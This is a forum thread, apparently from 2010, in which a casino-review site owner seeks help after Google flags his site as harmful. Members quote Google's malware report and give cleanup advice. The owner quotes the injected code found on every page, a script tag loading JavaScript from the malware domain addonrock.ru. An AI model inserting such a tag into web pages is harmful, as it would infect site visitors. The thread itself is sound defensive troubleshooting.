I need urgent HELP!

[Nandakishore]

I was told by someone that when he tried to visit Online Casino Newsroom via a Chrome browser he got a warning message that a visit to this site might damage his computer It would be nice if some of you guys can check this.

[Dominique]

I went to the site using IE but got no such warning.

However, your google listing says this:

Online Casino Newsroom - casino review of top online casinos
This site may harm your computer.
Online Casino Newsroom, gambling guide for best online games, casino review of top online casinos, US Players Welcome casinos, casino bonuses, jackpot guide ...
www.online-casino-newsroom.com/ - Similar

[Dominique]

Found this:

http://www.google.com/support/websea...n&answer=45449

[mojo]

I'm in IE and like Dom said, there is a warning.

When you click it here is the message, I took a screenie for you...

google warning

[Redbush54]

I tried it with Chrome and did get the warning.

What is the current listing status for online-casino-newsroom.com?
Site is listed as suspicious - visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 2 time(s) over the past 90 days.

What happened when Google visited this site?
Of the 3 pages we tested on the site over the past 90 days, 3 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2010-09-21, and the last time suspicious content was found on this site was on 2010-09-21.
Malicious software is hosted on 2 domain(s), including alienradar.ru/, addonrock.ru/.

This site was hosted on 1 network(s) including AS26496 (PAH).

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, online-casino-newsroom.com did not appear to function as an intermediary for the infection of any sites.

Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.

How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

Next steps:
Return to the previous page.
If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.

[Dominique]

Here is how google will fix:

http://www.google.com/support/webmas...?answer=163633

[elgoog]

Yes, site is infected (firefox)

Van de 3 pagina's die we in de afgelopen 90 dagen op de site hebben getest, hebben 3 pagina('s) zonder de toestemming van de gebruiker schadelijke software gedownload en geïnstalleerd. De vorige keer dat Google deze site bezocht, was op 2010-09-21. De vorige keer dat verdachte inhoud op deze site werd aangetroffen, was op 2010-09-21.Schadelijke software wordt op 2 domein(en) gehost, waaronder alienradar.ru/, addonrock.ru/.
This site was hosted on 1 network(s) including AS26496 (PAH).

[Deaddog]

Another screenshot for you, in Firefox.

[slotplayer]

Viewing your source code (first attachment image ) it looks like you may have some malware (second attachment image) unless you know what that script is.
If not I suggest everyone do a complete scan.

Scripts outside the closing html tag are usually a good clue. Another clue is if the date/time stamp is changed when viewing files in the FTP or C-Planel pane on your host. Usually in the FTP program host side pane you can right click on a file and view source/file. Scroll to the bottom and see if the malware script is present.

You'll need to do a full scan on your pc and then check all your html files and upload clean ones. I looked at the source for another page on your site and it has the same code. So it looks like it migrated site wide. Maybe your host can do a scan after uploading clean files.



Attachment 1270




Attachment 1271

[Nandakishore]

I think I have now some serious problem. With the help of the Webmaster tool I found that the following script is 'suspected injected code'. This code is not all known to me, and what is worse, I have found it on EVERY PAGE at the end!

<scripttype="text/javascript" src="http://addonrock.ru/Kerning.js"></< font>script>

It must have been inserted today because the webmaster tool didn't show any malware till yesterday.

I have no idea what I can do now.


<!--107a70bbefd9d46b3ac54d0b91ea618d-->

[Thomas Angerer]

Hallo Nandakishore,
Das tut mir Leid wegen der schlechten Nachrichten.
Ich hoffe das wird schnell wieder!
Gruß

[Nandakishore]

Ich fürchte, das wird nicht so einfach sein. Ich versuche momentan, mit unserem Provider und Server Admin Kontakt aufzunehmen.

[slotplayer]

I think I have now some serious problem. With the help of the Webmaster tool I found that the following script is 'suspected injected code'. This code is not all known to me, and what is worse, I have found it on EVERY PAGE at the end!

<scripttype="text/javascript" src="http://addonrock.ru/Kerning.js"></< font>script>

It must have been inserted today because the webmaster tool didn't show any malware till yesterday.

I have no idea what I can do now.


<!--107a70bbefd9d46b3ac54d0b91ea618d-->

You saw my post and looked at the attachments?
Apparently not,

well that is the last time I'll help anyone.

[mojo]

You saw my post and looked at the attachments?
Apparently not,

well that is the last time I'll help anyone.

I think Nan just has his hands full right now slotplayer. I'm sure he appreciates the input. I'd probably be in a bit of a panic myself.

I'm curious to know how long google will take to reinstate the site once the problem is gone.

[andreea]

This seems to be a common theme with some sites. It appears that the same 2 russian domains are behind the issue.

I'm not sure whether this was in one of the previous posts but take a look at this explanation from Google: http://www.google.com/support/webmas...nswer=163633#2

Apparently if you download the Google Webmaster toolbar (if you don't already have it) it may give you more specific information as to the issue, especially if you are the site owner. It may be anything from a server hack (which is what this may be) to an infected computer uploading infected files. Since this is happening to more than one gambling site with the same information, it may be the former.

Google recommends: http://www.google.com/support/webmas...?answer=163634

Hope that helps

[Nandakishore]

You saw my post and looked at the attachments?
Apparently not,

well that is the last time I'll help anyone.

I had not read your post when I posted mine. However, I passed on your info to my server admin as soon as I read it. Thanks a lot. By the way, your attachments are empty.

[slotplayer]

I had not read your post when I posted mine. However, I passed on your info to my server admin as soon as I read it. Thanks a lot. By the way, your attachments are empty.

Well I apologize then. I click on the attachments and can see the images.

Anyone see them empty? Man I need to get better at using the forum gizmos.

[Nandakishore]

No problem Slotworld. When I click on the attachments I get the message:
The page you are looking for cannot be found.
Click here to go back to the home page.

[jctroy440]

Try using Google webmaster tools and scan for malware.

You might want to contact your hosting service and see if they can help also

[slotplayer]

No problem Slotworld. When I click on the attachments I get the message:
The page you are looking for cannot be found.
Click here to go back to the home page.

I can't display them either with Fire Fox but with IE I can.

In an event here they are. This was your source code from the infected site.




Here is the second one which just shows its a virus of sorts:




I've seen this happen before and it can put the malware code in every file, even in files in sub directories created by your hosting provider.

Do you still need help on how to clean this?